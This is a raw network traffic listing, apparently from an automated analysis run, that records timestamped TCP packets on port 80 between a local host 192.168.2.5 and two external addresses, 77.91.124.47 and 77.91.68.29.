Jul 27, 2023 01:32:59.623673916 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.623747110 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.623795033 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.623807907 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.623878956 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.623928070 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.623931885 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.623980045 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624032021 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624075890 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624080896 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624129057 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624174118 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624181032 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624233961 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624279976 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624308109 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624363899 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624414921 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624420881 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624464989 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624468088 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624516010 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624557972 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624561071 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624602079 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624641895 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624643087 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624684095 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624725103 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624763966 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624768019 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624804020 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624840975 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624845028 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624885082 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624921083 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.624926090 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.624965906 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.625001907 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.665368080 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.665452957 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.665493011 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.665530920 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.665568113 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.665606976 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.665647030 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.665683985 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.665704012 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.665724039 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:32:59.665798903 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:32:59.665823936 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.009725094 CEST	49718	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:00.010229111 CEST	49720	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:00.054081917 CEST	80	49718	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:00.054208040 CEST	49718	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:00.054661036 CEST	80	49720	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:00.054765940 CEST	49720	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:00.055062056 CEST	49720	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:00.055095911 CEST	49720	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:00.099452972 CEST	80	49720	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:00.099494934 CEST	80	49720	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:00.106507063 CEST	80	49720	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:00.149327040 CEST	49720	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:00.149466991 CEST	49720	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:00.193875074 CEST	80	49720	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:00.193996906 CEST	80	49720	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:00.197571039 CEST	80	49720	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:00.246814966 CEST	49720	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:00.250212908 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.250829935 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.295008898 CEST	80	49719	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.295131922 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.295248032 CEST	49719	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.295309067 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.295901060 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.340497971 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340539932 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340572119 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340598106 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340625048 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340625048 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.340655088 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340686083 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340704918 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.340715885 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340743065 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.340748072 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340779066 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.340780973 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.340826988 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385076046 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385138988 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385174990 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385210037 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385234118 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385302067 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385421991 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385454893 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385488033 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385504961 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385520935 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385555983 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385590076 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385591984 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385624886 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385648012 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385659933 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385715961 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385732889 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385746956 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385782003 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385811090 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385814905 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385848999 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385874987 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385884047 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385917902 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.385927916 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.385951042 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.386070967 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.430054903 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430138111 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430197001 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430254936 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430299044 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.430394888 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.430537939 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430598974 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430655956 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430685997 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.430716038 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430790901 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430871964 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.430890083 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.430948019 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431005001 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431044102 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.431066036 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431075096 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.431124926 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431180000 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.431180954 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431241035 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431298018 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431301117 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.431356907 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431427956 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.431545973 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431642056 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431700945 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431720018 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.431759119 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431818008 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431819916 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.431875944 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431932926 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.431936979 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.431991100 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432048082 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432070017 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.432106018 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432166100 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432182074 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.432224035 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432298899 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.432329893 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432391882 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432449102 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432491064 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.432504892 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432562113 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432616949 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432645082 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.432672977 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432701111 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.432734013 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432790041 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432845116 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.432847023 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.434571028 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.475174904 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475223064 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475251913 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475275993 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475301027 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475323915 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475347042 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475368977 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475424051 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.475526094 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.475584030 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475673914 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475703955 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475725889 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475790024 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.475825071 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475873947 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475893974 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475930929 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.475959063 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.475994110 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.475997925 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.476041079 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.476114988 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.476120949 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.476136923 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.476181030 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.476202965 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.476236105 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.476296902 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.476321936 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.476371050 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.476416111 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.476918936 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.476952076 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477044106 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.477289915 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477384090 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477411985 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477435112 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477456093 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.477502108 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.477628946 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477653980 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477688074 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477732897 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.477745056 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477760077 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.477790117 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477813005 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477823973 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.477853060 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477869987 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.477879047 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477900982 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477953911 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.477973938 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.478009939 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.478032112 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.478034019 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.478061914 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.478113890 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.478116035 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.478138924 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.478163004 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.478172064 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.478188038 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.478212118 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.478250027 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.478266001 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.478319883 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.478924036 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.479070902 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.519831896 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.519925117 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.519962072 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520050049 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.520210028 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520318985 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520402908 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.520407915 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520474911 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.520497084 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520556927 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520618916 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520628929 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.520685911 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520744085 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520747900 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.520808935 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520870924 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.520875931 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520936012 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.520997047 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521059036 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.521069050 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521132946 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521203041 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.521224022 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521289110 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.521297932 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521359921 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521424055 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.521429062 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521503925 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521567106 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.521573067 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521632910 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521692038 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521761894 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.521770000 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521833897 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521900892 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.521903992 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.521967888 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522038937 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522048950 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522109032 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522120953 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522397041 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522488117 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522562027 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522562027 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522619009 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522634029 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522691965 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522706985 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522768021 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522780895 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522841930 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522852898 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522910118 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522924900 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.522983074 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.522995949 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523056984 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.523068905 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523129940 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.523144007 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523202896 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.523215055 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523278952 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.523298025 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523359060 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.523360014 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523427010 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.523436069 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523515940 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523581982 CEST	49721	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:33:00.523591042 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523652077 CEST	80	49721	77.91.124.47	192.168.2.5
Jul 27, 2023 01:33:00.523709059 CEST	49721	80	192.168.2.5	77.91.124.47
